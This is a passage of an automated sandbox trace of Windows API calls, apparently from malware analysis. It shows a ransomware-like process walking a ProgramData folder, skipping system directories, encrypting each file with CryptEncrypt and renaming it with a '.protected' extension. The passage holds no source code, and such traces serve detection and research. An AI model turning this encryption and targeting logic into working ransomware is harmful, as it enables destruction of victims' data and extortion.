lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.503] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.503] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.504] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.504] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.504] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.504] CloseHandle (hObject=0xa4) returned 1 [0072.504] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.protected") returned 64 [0072.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn.protected")) returned 1 [0072.505] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.505] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="Windows") returned -1 [0072.505] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="Program Files") returned -1 [0072.505] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.505] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.505] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.505] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 55 [0072.505] StrStrIW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.505] lstrcmpW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.505] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.505] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.505] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 55 [0072.505] StrStrW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 55 [0072.505] StrStrW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 55 [0072.505] StrStrW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.505] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x14c, lpOverlapped=0x0) returned 1 [0072.506] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.506] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x14c, lpOverlapped=0x0) returned 1 [0072.507] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.507] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.507] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.507] CloseHandle (hObject=0xa4) returned 1 [0072.507] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.protected") returned 65 [0072.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn.protected")) returned 1 [0072.508] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.508] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="Windows") returned -1 [0072.508] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="Program Files") returned -1 [0072.508] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.508] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.508] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.508] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 57 [0072.508] StrStrIW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.508] lstrcmpW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.508] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.508] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.508] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.510] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 57 [0072.510] StrStrW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.510] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 57 [0072.510] StrStrW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.510] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 57 [0072.510] StrStrW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.510] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.511] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.511] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.512] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.512] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.512] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.512] CloseHandle (hObject=0xa4) returned 1 [0072.512] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.protected") returned 67 [0072.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn.protected")) returned 1 [0072.513] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.513] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="Windows") returned -1 [0072.513] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="Program Files") returned -1 [0072.513] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.513] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.513] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.513] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 63 [0072.513] StrStrIW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.513] lstrcmpW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.513] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.513] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.513] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.513] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 63 [0072.513] StrStrW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.513] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 63 [0072.513] StrStrW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.513] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 63 [0072.513] StrStrW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.513] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x17c, lpOverlapped=0x0) returned 1 [0072.514] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.514] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x17c, lpOverlapped=0x0) returned 1 [0072.515] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.515] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.515] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.515] CloseHandle (hObject=0xa4) returned 1 [0072.515] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.protected") returned 73 [0072.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn.protected")) returned 1 [0072.516] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.516] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="Windows") returned -1 [0072.516] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="Program Files") returned -1 [0072.516] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.516] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.516] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.516] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 57 [0072.516] StrStrIW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.516] lstrcmpW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.516] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.516] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.516] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.518] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 57 [0072.518] StrStrW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.518] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 57 [0072.518] StrStrW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.518] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 57 [0072.518] StrStrW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.518] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.519] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.519] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.519] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.519] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.519] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.519] CloseHandle (hObject=0xa4) returned 1 [0072.520] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.protected") returned 67 [0072.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn.protected")) returned 1 [0072.520] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.520] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.520] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.520] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.520] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.520] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.520] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 61 [0072.520] StrStrIW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.520] lstrcmpW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.521] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 61 [0072.521] StrStrW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.521] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 61 [0072.521] StrStrW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.521] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 61 [0072.521] StrStrW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.521] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x170, lpOverlapped=0x0) returned 1 [0072.522] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.522] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x170, lpOverlapped=0x0) returned 1 [0072.523] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.523] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.524] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.524] CloseHandle (hObject=0xa4) returned 1 [0072.524] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.protected") returned 71 [0072.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn.protected")) returned 1 [0072.525] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.525] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="Windows") returned -1 [0072.525] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="Program Files") returned -1 [0072.525] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.525] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.525] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.525] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 54 [0072.525] StrStrIW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.525] lstrcmpW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.525] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.525] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.525] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.525] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 54 [0072.525] StrStrW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.525] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 54 [0072.525] StrStrW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.525] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 54 [0072.525] StrStrW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.526] ReadFile (in: 